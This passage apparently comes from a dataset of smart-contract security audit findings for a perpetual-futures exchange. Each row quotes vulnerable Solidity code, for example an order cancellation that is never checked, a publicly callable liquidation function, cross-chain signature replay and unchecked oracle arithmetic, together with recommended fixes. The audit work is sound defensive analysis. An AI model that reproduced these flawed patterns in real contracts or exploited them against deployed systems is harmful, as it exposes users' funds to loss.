(uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n \\n uint256 c = (a \\* 1000000000000000000) / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\n",Try removing duplicate code/libraries and using a better inheritance model to include one file in all FairSwaps.,,"```\\nlibrary DecimalSafeMath {\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n uint256 a\\_ = a \\* 1000000000000000000;\\n uint256 c = a\\_ / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\n" +Exchange - CancelOrder has no effect Pending,high,"The exchange provides means for the `trader` or `broker` to cancel the order. The `cancelOrder` method, however, only stores the hash of the canceled order in mapping but the mapping is never checked. It is therefore effectively impossible for a `trader` to cancel an order.\\n```\\nfunction cancelOrder(LibOrder.Order memory order) public {\\n require(msg.sender == order.trader || msg.sender == order.broker, ""invalid caller"");\\n\\n bytes32 orderHash = order.getOrderHash();\\n cancelled[orderHash] = true;\\n\\n emit Cancel(orderHash);\\n}\\n```\\n",`matchOrders*` or `validateOrderParam` should check if `cancelled[orderHash] == true` and abort fulfilling the order.\\nVerify the order params (Signature) before accepting it as canceled.,,"```\\nfunction cancelOrder(LibOrder.Order memory order) public {\\n require(msg.sender == order.trader || msg.sender == order.broker, ""invalid caller"");\\n\\n bytes32 orderHash = order.getOrderHash();\\n cancelled[orderHash] = true;\\n\\n emit Cancel(orderHash);\\n}\\n```\\n" +Perpetual - withdraw should only be available in NORMAL state Pending,high,"According to the specification `withdraw` can only be called in `NORMAL` state. However, the implementation allows it to be called in `NORMAL` and `SETTLED` mode.\\nWithdraw only checks for `!SETTLING` state which resolves to `NORMAL` and `SETTLED`.\\n```\\nfunction withdraw(uint256 amount) public {\\n withdrawFromAccount(msg.sender, amount);\\n}\\n```\\n\\n```\\nfunction withdrawFromAccount(address payable guy, uint256 amount) private {\\n require(guy != address(0), ""invalid guy"");\\n require(status != LibTypes.Status.SETTLING, ""wrong perpetual status"");\\n\\n uint256 currentMarkPrice = markPrice();\\n require(isSafeWithPrice(guy, currentMarkPrice), ""unsafe before withdraw"");\\n remargin(guy, currentMarkPrice);\\n address broker = currentBroker(guy);\\n bool forced = broker == address(amm.perpetualProxy()) || broker == address(0);\\n withdraw(guy, amount, forced);\\n\\n require(isSafeWithPrice(guy, currentMarkPrice), ""unsafe after withdraw"");\\n require(availableMarginWithPrice(guy, currentMarkPrice) >= 0, ""withdraw margin"");\\n}\\n```\\n\\nIn contrast, `withdrawFor` requires the state to be NORMAL:\\n```\\nfunction withdrawFor(address payable guy, uint256 amount) public onlyWhitelisted {\\n require(status == LibTypes.Status.NORMAL, ""wrong perpetual status"");\\n withdrawFromAccount(guy, amount);\\n}\\n```\\n",Resolution\\nThis issue was resolved by requiring `status == LibTypes.Status.NORMAL`.\\n`withdraw` should only be available in the `NORMAL` operation mode.,,"```\\nfunction withdraw(uint256 amount) public {\\n withdrawFromAccount(msg.sender, amount);\\n}\\n```\\n" +Perpetual - withdrawFromInsuranceFund should check wadAmount instead of rawAmount Pending,high,"`withdrawFromInsurance` checks that enough funds are in the insurance fund before allowing withdrawal by an admin by checking the provided `rawAmount` <= insuranceFundBalance.toUint256(). `rawAmount` is the `ETH` (18 digit precision) or collateral token amount (can be less than 18 digit precision) to be withdrawn while `insuranceFundBalance` is a WAD-denominated value (18 digit precision).\\nThe check does not hold if the configured collateral has different precision and may have unwanted consequences, e.g. the withdrawal of more funds than expected.\\nNote: there is another check for `insuranceFundBalance` staying positive after the potential external call to collateral.\\n```\\nfunction withdrawFromInsuranceFund(uint256 rawAmount) public onlyWhitelistAdmin {\\n require(rawAmount > 0, ""invalid amount"");\\n require(insuranceFundBalance > 0, ""insufficient funds"");\\n require(rawAmount <= insuranceFundBalance.toUint256(), ""insufficient funds"");\\n\\n int256 wadAmount = toWad(rawAmount);\\n insuranceFundBalance = insuranceFundBalance.sub(wadAmount);\\n withdrawFromProtocol(msg.sender, rawAmount);\\n\\n require(insuranceFundBalance >= 0, ""negtive insurance fund"");\\n\\n emit UpdateInsuranceFund(insuranceFundBalance);\\n}\\n```\\n\\nWhen looking at the test-cases there seems to be a misconception about what unit of amount `withdrawFromInsuranceFund` is taking. For example, the insurance fund withdrawal and deposit are not tested for collateral that specifies a precision that is not 18. The test-cases falsely assume that the input to `withdrawFromInsuranceFund` is a WAD value, while it is taking the collateral's `rawAmount` which is then converted to a WAD number.\\ncode/test/test_perpetual.js:L471-L473\\n```\\nawait perpetual.withdrawFromInsuranceFund(toWad(10.111));\\nfund = await perpetual.insuranceFundBalance();\\nassert.equal(fund.toString(), 0);\\n```\\n","Check that `require(wadAmount <= insuranceFundBalance.toUint256(), ""insufficient funds"");`, add a test-suite testing the insurance fund with collaterals with different precision and update existing tests that properly provide the expected input to `withdraFromInsurance`.",,"```\\nfunction withdrawFromInsuranceFund(uint256 rawAmount) public onlyWhitelistAdmin {\\n require(rawAmount > 0, ""invalid amount"");\\n require(insuranceFundBalance > 0, ""insufficient funds"");\\n require(rawAmount <= insuranceFundBalance.toUint256(), ""insufficient funds"");\\n\\n int256 wadAmount = toWad(rawAmount);\\n insuranceFundBalance = insuranceFundBalance.sub(wadAmount);\\n withdrawFromProtocol(msg.sender, rawAmount);\\n\\n require(insuranceFundBalance >= 0, ""negtive insurance fund"");\\n\\n emit UpdateInsuranceFund(insuranceFundBalance);\\n}\\n```\\n" +Perpetual - liquidateFrom should not have public visibility Pending,high,"`Perpetual.liquidate` is used to liquidate an account that is “unsafe,” determined by the relative sizes of `marginBalanceWithPrice` and maintenanceMarginWithPrice:\\n```\\n// safe for liquidation\\nfunction isSafeWithPrice(address guy, uint256 currentMarkPrice) public returns (bool) {\\n return\\n marginBalanceWithPrice(guy, currentMarkPrice) >=\\n maintenanceMarginWithPrice(guy, currentMarkPrice).toInt256();\\n}\\n```\\n\\n`Perpetual.liquidate` allows the caller to assume the liquidated account's position, as well as a small amount of “penalty collateral.” The steps to liquidate are, roughly:\\nClose the liquidated account's position\\nPerform a trade on the liquidated assets with the liquidator acting as counter-party\\nGrant the liquidator a portion of the liquidated assets as a reward. An additional portion is added to the insurance fund.\\nHandle any losses\\nWe found several issues in Perpetual.liquidate:\\n`liquidateFrom` has `public` visibility:\\n```\\nfunction liquidateFrom(address from, address guy, uint256 maxAmount) public returns (uint256, uint256) {\\n```\\n\\nGiven that `liquidate` only calls `liquidateFrom` after checking the current contract's status, this oversight allows anyone to call `liquidateFrom` during the `SETTLED` stage:\\n```\\nfunction liquidate(address guy, uint256 maxAmount) public returns (uint256, uint256) {\\n require(status != LibTypes.Status.SETTLED, ""wrong perpetual status"");\\n return liquidateFrom(msg.sender, guy, maxAmount);\\n}\\n```\\n\\nAdditionally, directly calling `liquidateFrom` allows anyone to liquidate on behalf of other users, forcing other accounts to assume liquidated positions.\\nFinally, neither `liquidate` nor `liquidateFrom` check that the liquidated account and liquidator are the same. Though the liquidation accounting process is hard to follow, we believe this is unintended and could lead to large errors in internal contract accounting.","Make `liquidateFrom` an `internal` function\\nIn `liquidate` or `liquidateFrom`, check that `msg.sender != guy`",,"```\\n// safe for liquidation\\nfunction isSafeWithPrice(address guy, uint256 currentMarkPrice) public returns (bool) {\\n return\\n marginBalanceWithPrice(guy, currentMarkPrice) >=\\n maintenanceMarginWithPrice(guy, currentMarkPrice).toInt256();\\n}\\n```\\n" +Unpredictable behavior due to front running or general bad timing Pending,high,"In a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nSome instances of this are more important than others, but in general users of the system should have assurances about the behavior of the action they're about to take.\\nThe deployer of the `PerpetualGovernance`, `AMMGovernance`, and `GlobalConfig` contracts are set as administrators for the contracts through `WhitelistedRole`. The `WhitelistedAdminRole` can whitelist other accounts at any time and allow them to perform actions protected by the `onlyWhitelisted` decorator.\\nUpdating governance and global configuration parameters are not protected by a time-lock and take effect immediately. This, therefore, creates an opportunity for administrators to front-run users on the exchange by changing parameters for orders. It may also allow an administrator to temporarily lift restrictions for themselves (e.g. withdrawalLockBlockCount).\\n`GlobalConfig`\\n`withdrawalLockBlockCount` is queried when applying for withdrawal. This value can be set zero enabling allowing immediate withdrawal.\\n`brokerLockBlockCount` is queried when setting a new broker. This value can e set to zero effectively enabling immediate broker changes.\\n```\\nfunction setGlobalParameter(bytes32 key, uint256 value) public onlyWhitelistAdmin {\\n if (key == ""withdrawalLockBlockCount"") {\\n withdrawalLockBlockCount = value;\\n } else if (key == ""brokerLockBlockCount"") {\\n brokerLockBlockCount = value;\\n } else {\\n revert(""key not exists"");\\n }\\n emit UpdateGlobalParameter(key, value);\\n}\\n```\\n\\n`PerpetualGovernance`\\ne.g. Admin can front-run specific `matchOrder` calls and set arbitrary dev fees or curve parameters…\\n```\\nfunction setGovernanceParameter(bytes32 key, int256 value) public onlyWhitelistAdmin {\\n if (key == ""initialMarginRate"") {\\n governance.initialMarginRate = value.toUint256();\\n require(governance.initialMarginRate > 0, ""require im > 0"");\\n require(governance.initialMarginRate < 10\\*\\*18, ""require im < 1"");\\n require(governance.maintenanceMarginRate < governance.initialMarginRate, ""require mm < im"");\\n } else if (key == ""maintenanceMarginRate"") {\\n governance.maintenanceMarginRate = value.toUint256();\\n require(governance.maintenanceMarginRate > 0, ""require mm > 0"");\\n require(governance.maintenanceMarginRate < governance.initialMarginRate, ""require mm < im"");\\n require(governance.liquidationPenaltyRate < governance.maintenanceMarginRate, ""require lpr < mm"");\\n require(governance.penaltyFundRate < governance.maintenanceMarginRate, ""require pfr < mm"");\\n } else if (key == ""liquidationPenaltyRate"") {\\n governance.liquidationPenaltyRate = value.toUint256();\\n require(governance.liquidationPenaltyRate < governance.maintenanceMarginRate, ""require lpr < mm"");\\n } else if (key == ""penaltyFundRate"") {\\n governance.penaltyFundRate = value.toUint256();\\n require(governance.penaltyFundRate < governance.maintenanceMarginRate, ""require pfr < mm"");\\n } else if (key == ""takerDevFeeRate"") {\\n governance.takerDevFeeRate = value;\\n } else if (key == ""makerDevFeeRate"") {\\n governance.makerDevFeeRate = value;\\n } else if (key == ""lotSize"") {\\n require(\\n governance.tradingLotSize == 0 || governance.tradingLotSize.mod(value.toUint256()) == 0,\\n ""require tls % ls == 0""\\n );\\n governance.lotSize = value.toUint256();\\n } else if (key == ""tradingLotSize"") {\\n require(governance.lotSize == 0 || value.toUint256().mod(governance.lotSize) == 0, ""require tls % ls == 0"");\\n governance.tradingLotSize = value.toUint256();\\n } else if (key == ""longSocialLossPerContracts"") {\\n require(status == LibTypes.Status.SETTLING, ""wrong perpetual status"");\\n socialLossPerContracts[uint256(LibTypes.Side.LONG)] = value;\\n } else if (key == ""shortSocialLossPerContracts"") {\\n require(status == LibTypes.Status.SETTLING, ""wrong perpetual status"");\\n socialLossPerContracts[uint256(LibTypes.Side.SHORT)] = value;\\n } else {\\n revert(""key not exists"");\\n }\\n emit UpdateGovernanceParameter(key, value);\\n}\\n```\\n\\nAdmin can set `devAddress` or even update to a new `amm` and `globalConfig`\\n```\\nfunction setGovernanceAddress(bytes32 key, address value) public onlyWhitelistAdmin {\\n require(value != address(0x0), ""invalid address"");\\n if (key == ""dev"") {\\n devAddress = value;\\n } else if (key == ""amm"") {\\n amm = IAMM(value);\\n } else if (key == ""globalConfig"") {\\n globalConfig = IGlobalConfig(value);\\n } else {\\n revert(""key not exists"");\\n }\\n emit UpdateGovernanceAddress(key, value);\\n}\\n```\\n\\n`AMMGovernance`\\n```\\nfunction setGovernanceParameter(bytes32 key, int256 value) public onlyWhitelistAdmin {\\n if (key == ""poolFeeRate"") {\\n governance.poolFeeRate = value.toUint256();\\n } else if (key == ""poolDevFeeRate"") {\\n governance.poolDevFeeRate = value.toUint256();\\n } else if (key == ""emaAlpha"") {\\n require(value > 0, ""alpha should be > 0"");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n } else if (key == ""updatePremiumPrize"") {\\n governance.updatePremiumPrize = value.toUint256();\\n } else if (key == ""markPremiumLimit"") {\\n governance.markPremiumLimit = value;\\n } else if (key == ""fundingDampener"") {\\n governance.fundingDampener = value;\\n } else {\\n revert(""key not exists"");\\n }\\n emit UpdateGovernanceParameter(key, value);\\n}\\n```\\n","The underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all updates to system parameters or upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.\\nAdditionally, users should verify the whitelist setup before using the contract system and monitor it for new additions to the whitelist. Documentation should clearly outline what roles are owned by whom to support suitability. Sane parameter bounds should be enforced (e.g. min. disallow block delay of zero )",,"```\\nfunction setGlobalParameter(bytes32 key, uint256 value) public onlyWhitelistAdmin {\\n if (key == ""withdrawalLockBlockCount"") {\\n withdrawalLockBlockCount = value;\\n } else if (key == ""brokerLockBlockCount"") {\\n brokerLockBlockCount = value;\\n } else {\\n revert(""key not exists"");\\n }\\n emit UpdateGlobalParameter(key, value);\\n}\\n```\\n" +AMM - Governance is able to set an invalid alpha value Pending,medium,"According to https://en.wikipedia.org/wiki/Moving_average\\nThe coefficient α represents the degree of weighting decrease, a constant smoothing factor between 0 and 1. A higher α discounts older observations faster.\\nHowever, the code does not check upper bounds. An admin may, therefore, set an invalid alpha that puts `emaAlpha2` out of bounds or negative.\\n```\\n} else if (key == ""emaAlpha"") {\\n require(value > 0, ""alpha should be > 0"");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n```\\n",Ensure that the system configuration is always within safe bounds. Document expected system variable types and their safe operating ranges. Enforce that bounds are checked every time a value is set. Enforce safe defaults when deploying contracts.\\nEnsure `emaAlpha` is `0 < value < 1 WAD`,,"```\\n} else if (key == ""emaAlpha"") {\\n require(value > 0, ""alpha should be > 0"");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n```\\n" +Exchange - insufficient input validation in matchOrders Pending,medium,"`matchOrders` does not check that that the sender has provided the same number of `amounts` as `makerOrderParams`. When fewer `amounts` exist than `makerOrderParams`, the method will revert because of an out-of-bounds array access. When fewer `makerOrderParams` exist than `amounts`, the method will succeed, and the additional values in `amounts` will be ignored.\\nAdditionally, the method allows the sender to provide no `makerOrderParams` at all, resulting in no state changes.\\n`matchOrders` also does not reject trades with an amount set to zero. Such orders should be rejected because they do not comply with the minimum `tradingLotSize` configured for the system. As a side-effect, events may be emitted for zero-amount trades and unexpected state changes may occur.\\n```\\nfunction matchOrders(\\n LibOrder.OrderParam memory takerOrderParam,\\n LibOrder.OrderParam[] memory makerOrderParams,\\n address \\_perpetual,\\n uint256[] memory amounts\\n) public {\\n```\\n\\n```\\nfunction matchOrderWithAMM(LibOrder.OrderParam memory takerOrderParam, address \\_perpetual, uint256 amount) public {\\n```\\n","Resolution\\nThis issue was addressed by following the recommendation to verify that `amounts.length > 0 && makerOrderParams.length == amounts.length`. However, the code does not abort if one of the `amounts` is zero which should never happen and therefore raise an exception due to it likely being an erroneous call. Additionally, the method now enforces that only a broker can interact with the interface.\\nRequire `makerOrderParams.length > 0 && amounts.length == makerOrderParams.length`\\nRequire that `amount` or any of the `amounts[i]` provided to `matchOrders` is `>=tradingLotSize`.",,"```\\nfunction matchOrders(\\n LibOrder.OrderParam memory takerOrderParam,\\n LibOrder.OrderParam[] memory makerOrderParams,\\n address \\_perpetual,\\n uint256[] memory amounts\\n) public {\\n```\\n" +AMM - Liquidity provider may lose up to lotSize when removing liquidity Acknowledged,medium,"When removing liquidity, the amount of collateral received is calculated from the `shareAmount` (ShareToken) of the liquidity provider. The liquidity removal process registers a trade on the amount, with the liquidity provider and `AMM` taking opposite sides. Because trading only accepts multiple of the `lotSize`, the leftover is discarded. The amount discarded may be up to `lotSize - 1`.\\nThe expectation is that this value should not be too high, but as `lotSize` can be set to arbitrary values by an admin, it is possible that this step discards significant value. Additionally, see issue 6.6 for how this can be exploited by an admin.\\nNote that similar behavior is present in `Perpetual.liquidateFrom`, where the `liquidatableAmount` calculated undergoes a similar modulo operation:\\n```\\nuint256 liquidatableAmount = totalPositionSize.sub(totalPositionSize.mod(governance.lotSize));\\nliquidationAmount = liquidationAmount.ceil(governance.lotSize).min(maxAmount).min(liquidatableAmount);\\n```\\n\\n`lotSize` can arbitrarily be set up to `pos_int256_max` as long as `tradingLotSize % `lotSize` == 0`\\n```\\n} else if (key == ""lotSize"") {\\n require(\\n governance.tradingLotSize == 0 || governance.tradingLotSize.mod(value.toUint256()) == 0,\\n ""require tls % ls == 0""\\n );\\n governance.lotSize = value.toUint256();\\n} else if (key == ""tradingLotSize"") {\\n require(governance.lotSize == 0 || value.toUint256().mod(governance.lotSize) == 0, ""require tls % ls == 0"");\\n governance.tradingLotSize = value.toUint256();\\n```\\n\\n`amount` is derived from `shareAmount` rounded down to the next multiple of the `lotSize`. The leftover is discarded.\\n```\\nuint256 amount = shareAmount.wmul(oldPoolPositionSize).wdiv(shareToken.totalSupply());\\namount = amount.sub(amount.mod(perpetualProxy.lotSize()));\\n\\nperpetualProxy.transferBalanceOut(trader, price.wmul(amount).mul(2));\\nburnShareTokenFrom(trader, shareAmount);\\nuint256 opened = perpetualProxy.trade(trader, LibTypes.Side.LONG, price, amount);\\n```\\n","Ensure that documentation makes users aware of the fact that they may lose up to `lotsize-1` in value.\\nAlternatively, track accrued value and permit trades on values that exceed `lotSize`. Note that this may add significant complexity.\\nEnsure that similar system behavior, like the `liquidatableAmount` calculated in `Perpetual.liquidateFrom`, is also documented and communicated clearly to users.",,```\\nuint256 liquidatableAmount = totalPositionSize.sub(totalPositionSize.mod(governance.lotSize));\\nliquidationAmount = liquidationAmount.ceil(governance.lotSize).min(maxAmount).min(liquidatableAmount);\\n```\\n +Oracle - Unchecked oracle response timestamp and integer over/underflow,medium,"The external Chainlink oracle, which provides index price information to the system, introduces risk inherent to any dependency on third-party data sources. For example, the oracle could fall behind or otherwise fail to be maintained, resulting in outdated data being fed to the index price calculations of the AMM. Oracle reliance has historically resulted in crippled on-chain systems, and complications that lead to these outcomes can arise from things as simple as network congestion.\\nEnsuring that unexpected oracle return values are properly handled will reduce reliance on off-chain components and increase the resiliency of the smart contract system that depends on them.\\nThe `ChainlinkAdapter` and `InversedChainlinkAdapter` take the oracle's (int256) `latestAnswer` and convert the result using `chainlinkDecimalsAdapter`. This arithmetic operation can underflow/overflow if the Oracle provides a large enough answer:\\n```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = (feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n\\n```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = ONE.wdiv(feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n\\nThe oracle provides a timestamp for the `latestAnswer` that is not validated and may lead to old oracle timestamps being accepted (e.g. caused by congestion on the blockchain or a directed censorship attack).\\n```\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n","Use `SafeMath` for mathematical computations\\nVerify `latestAnswer` is within valid bounds (!=0)\\nVerify `latestTimestamp` is within accepted bounds (not in the future, was updated within a reasonable amount of time)\\nDeduplicate code by combining both Adapters into one as the only difference is that the `InversedChainlinkAdapter` returns `ONE.wdiv(price)`.",,"```\\nint256 public constant chainlinkDecimalsAdapter = 10\\*\\*10;\\n\\nconstructor(address \\_feeder) public {\\n feeder = IChainlinkFeeder(\\_feeder);\\n}\\n\\nfunction price() public view returns (uint256 newPrice, uint256 timestamp) {\\n newPrice = (feeder.latestAnswer() \\* chainlinkDecimalsAdapter).toUint256();\\n timestamp = feeder.latestTimestamp();\\n}\\n```\\n" +Perpetual - Administrators can put the system into emergency mode indefinitely Pending,medium,"There is no limitation on how long an administrator can put the `Perpetual` contract into emergency mode. Users cannot trade or withdraw funds in emergency mode and are effectively locked out until the admin chooses to put the contract in `SETTLED` mode.\\n```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, ""already settled"");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n\\n```\\nfunction endGlobalSettlement() public onlyWhitelistAdmin {\\n require(status == LibTypes.Status.SETTLING, ""wrong perpetual status"");\\n\\n address guy = address(amm.perpetualProxy());\\n settleFor(guy);\\n status = LibTypes.Status.SETTLED;\\n\\n emit EndGlobalSettlement();\\n}\\n```\\n","Resolution\\nThe client provided the following statement addressing the issue:\\nIt should be solved by voting. Moreover, we add two roles who is able to disable withdrawing /pause the system.\\nThe duration of the emergency phase is still unrestricted.\\nSet a time-lock when entering emergency mode that allows anyone to set the system to `SETTLED` after a fixed amount of time.",,"```\\nfunction beginGlobalSettlement(uint256 price) public onlyWhitelistAdmin {\\n require(status != LibTypes.Status.SETTLED, ""already settled"");\\n settlementPrice = price;\\n status = LibTypes.Status.SETTLING;\\n emit BeginGlobalSettlement(price);\\n}\\n```\\n" +Signed data may be usable cross-chain,medium,"Signed order data may be re-usable cross-chain as the chain-id is not explicitly part of the signed data.\\nIt is also recommended to further harden the signature verification and validate that `v` and `s` are within expected bounds. `ecrecover()` returns `0x0` to indicate an error condition, therefore, a `signerAddress` or `recovered` address of `0x0` should explicitly be disallowed.\\nThe signed order data currently includes the EIP712 Domain Name `Mai Protocol` and the following information:\\n```\\nstruct Order {\\n address trader;\\n address broker;\\n address perpetual;\\n uint256 amount;\\n uint256 price;\\n /\\*\\*\\n \\* Data contains the following values packed into 32 bytes\\n \\* ╔════════════════════╤═══════════════════════════════════════════════════════════╗\\n \\* ║ │ length(bytes) desc ║\\n \\* ╟────────────────────┼───────────────────────────────────────────────────────────╢\\n \\* ║ version │ 1 order version ║\\n \\* ║ side │ 1 0: buy (long), 1: sell (short) ║\\n \\* ║ isMarketOrder │ 1 0: limitOrder, 1: marketOrder ║\\n \\* ║ expiredAt │ 5 order expiration time in seconds ║\\n \\* ║ asMakerFeeRate │ 2 maker fee rate (base 100,000) ║\\n \\* ║ asTakerFeeRate │ 2 taker fee rate (base 100,000) ║\\n \\* ║ (d) makerRebateRate│ 2 rebate rate for maker (base 100) ║\\n \\* ║ salt │ 8 salt ║\\n \\* ║ isMakerOnly │ 1 is maker only ║\\n \\* ║ isInversed │ 1 is inversed contract ║\\n \\* ║ │ 8 reserved ║\\n \\* ╚════════════════════╧═══════════════════════════════════════════════════════════╝\\n \\*/\\n bytes32 data;\\n}\\n```\\n\\nSignature verification:\\n```\\nfunction isValidSignature(OrderSignature memory signature, bytes32 hash, address signerAddress)\\n internal\\n pure\\n returns (bool)\\n{\\n uint8 method = uint8(signature.config[1]);\\n address recovered;\\n uint8 v = uint8(signature.config[0]);\\n\\n if (method == uint8(SignatureMethod.ETH\\_SIGN)) {\\n recovered = ecrecover(\\n keccak256(abi.encodePacked(""\\x19Ethereum Signed Message:\\n32"", hash)),\\n v,\\n signature.r,\\n signature.s\\n );\\n } else if (method == uint8(SignatureMethod.EIP712)) {\\n recovered = ecrecover(hash, v, signature.r, signature.s);\\n } else {\\n revert(""invalid sign method"");\\n }\\n\\n return signerAddress == recovered;\\n}\\n```\\n","Include the `chain-id` in the signature to avoid cross-chain validity of signatures\\nverify `s` is within valid bounds to avoid signature malleability\\n```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n revert(""ECDSA: invalid signature 's' value"");\\n }\\n```\\n\\nverify `v` is within valid bounds\\n```\\nif (v != 27 && v != 28) {\\n revert(""ECDSA: invalid signature 'v' value"");\\n}\\n```\\n\\nreturn invalid if the result of `ecrecover()` is `0x0`",,"```\\nstruct Order {\\n address trader;\\n address broker;\\n address perpetual;\\n uint256 amount;\\n uint256 price;\\n /\\*\\*\\n \\* Data contains the following values packed into 32 bytes\\n \\* ╔════════════════════╤═══════════════════════════════════════════════════════════╗\\n \\* ║ │ length(bytes) desc ║\\n \\* ╟────────────────────┼─────────────────────────────────────���─────────────────────╢\\n \\* ║ version │ 1 order version ║\\n \\* ║ side │ 1 0: buy (long), 1: sell (short) ║\\n \\* ║ isMarketOrder │ 1 0: limitOrder, 1: marketOrder ║\\n \\* ║ expiredAt │ 5 order expiration time in seconds ║\\n \\* ║ asMakerFeeRate │ 2 maker fee rate (base 100,000) ║\\n \\* ║ asTakerFeeRate │ 2 taker fee rate (base 100,000) ║\\n \\* ║ (d) makerRebateRate│ 2 rebate rate for maker (base 100) ║\\n \\* ║ salt │ 8 salt ║\\n \\* ║ isMakerOnly │ 1 is maker only ║\\n \\* ║ isInversed │ 1 is inversed contract ║\\n \\* ║ │ 8 reserved ║\\n \\* ╚════════════════════╧═══════════════════════════════════════════════════════════╝\\n \\*/\\n bytes32 data;\\n}\\n```\\n" +Exchange - validateOrderParam does not check against SUPPORTED_ORDER_VERSION,medium,"`validateOrderParam` verifies the signature and version of a provided order. Instead of checking against the contract constant `SUPPORTED_ORDER_VERSION` it, however, checks against a hardcoded version `2` in the method itself.\\nThis might be a problem if `SUPPORTED_ORDER_VERSION` is seen as the configuration parameter for the allowed version. Changing it would not change the allowed order version for `validateOrderParam` as this constant literal is never used.\\nAt the time of this audit, however, the `SUPPORTED_ORDER_VERSION` value equals the hardcoded value in the `validateOrderParam` method.\\n```\\nfunction validateOrderParam(IPerpetual perpetual, LibOrder.OrderParam memory orderParam)\\n internal\\n view\\n returns (bytes32)\\n{\\n address broker = perpetual.currentBroker(orderParam.trader);\\n require(broker == msg.sender, ""invalid broker"");\\n require(orderParam.getOrderVersion() == 2, ""unsupported version"");\\n require(orderParam.getExpiredAt() >= block.timestamp, ""order expired"");\\n\\n bytes32 orderHash = orderParam.getOrderHash(address(perpetual), broker);\\n require(orderParam.signature.isValidSignature(orderHash, orderParam.trader), ""invalid signature"");\\n require(filled[orderHash] < orderParam.amount, ""fullfilled order"");\\n\\n return orderHash;\\n}\\n```\\n",Check against `SUPPORTED_ORDER_VERSION` instead of the hardcoded value `2`.,,"```\\nfunction validateOrderParam(IPerpetual perpetual, LibOrder.OrderParam memory orderParam)\\n internal\\n view\\n returns (bytes32)\\n{\\n address broker = perpetual.currentBroker(orderParam.trader);\\n require(broker == msg.sender, ""invalid broker"");\\n require(orderParam.getOrderVersion() == 2, ""unsupported version"");\\n require(orderParam.getExpiredAt() >= block.timestamp, ""order expired"");\\n\\n bytes32 orderHash = orderParam.getOrderHash(address(perpetual), broker);\\n require(orderParam.signature.isValidSignature(orderHash, orderParam.trader), ""invalid signature"");\\n require(filled[orderHash] < orderParam.amount, ""fullfilled order"");\\n\\n return orderHash;\\n}\\n```\\n" +LibMathSigned - wpowi returns an invalid result for a negative exponent Pending,medium,"`LibMathSigned.wpowi(x,n)` calculates Wad value `x` (base) to the power of `n` (exponent). The exponent is declared as a signed int, however, the method returns wrong results when calculating `x ^(-n)`.\\nThe comment for the `wpowi` method suggests that `n` is a normal integer instead of a Wad-denominated value. This, however, is not being enforced.\\n`LibMathSigned.wpowi(8000000000000000000, 2) = 64000000000000000000`\\n(wrong) `LibMathSigned.wpowi(8000000000000000000, -2) = 64000000000000000000`\\n```\\n// x ^ n\\n// NOTE: n is a normal integer, do not shift 18 decimals\\n// solium-disable-next-line security/no-assign-params\\nfunction wpowi(int256 x, int256 n) internal pure returns (int256 z) {\\n z = n % 2 != 0 ? x : \\_WAD;\\n\\n for (n /= 2; n != 0; n /= 2) {\\n x = wmul(x, x);\\n\\n if (n % 2 != 0) {\\n z = wmul(z, x);\\n }\\n }\\n}\\n```\\n",Make `wpowi` support negative exponents or use the proper type for `n` (uint) and reject negative values.\\nEnforce that the exponent bounds are within sane ranges and less than a Wad to detect potential misuse where someone accidentally provides a Wad value as `n`.\\nAdd positive and negative unit-tests to fully cover this functionality.,,"```\\n// x ^ n\\n// NOTE: n is a normal integer, do not shift 18 decimals\\n// solium-disable-next-line security/no-assign-params\\nfunction wpowi(int256 x, int256 n) internal pure returns (int256 z) {\\n z = n % 2 != 0 ? x : \\_WAD;\\n\\n for (n /= 2; n != 0; n /= 2) {\\n x = wmul(x, x);\\n\\n if (n % 2 != 0) {\\n z = wmul(z, x);\\n }\\n }\\n}\\n```\\n" +Outdated solidity version and floating pragma Pending,medium,"Using an outdated compiler version can be problematic especially if there are publicly disclosed bugs and issues (see also https://github.com/ethereum/solidity/releases) that affect the current compiler version.\\nThe codebase specifies a floating version of `^0.5.2` and makes use of the experimental feature `ABIEncoderV2`.\\nIt should be noted, that `ABIEncoderV2` was subject to multiple bug-fixes up until the latest 0.6.xversion and contracts compiled with earlier versions are - for example - susceptible to the following 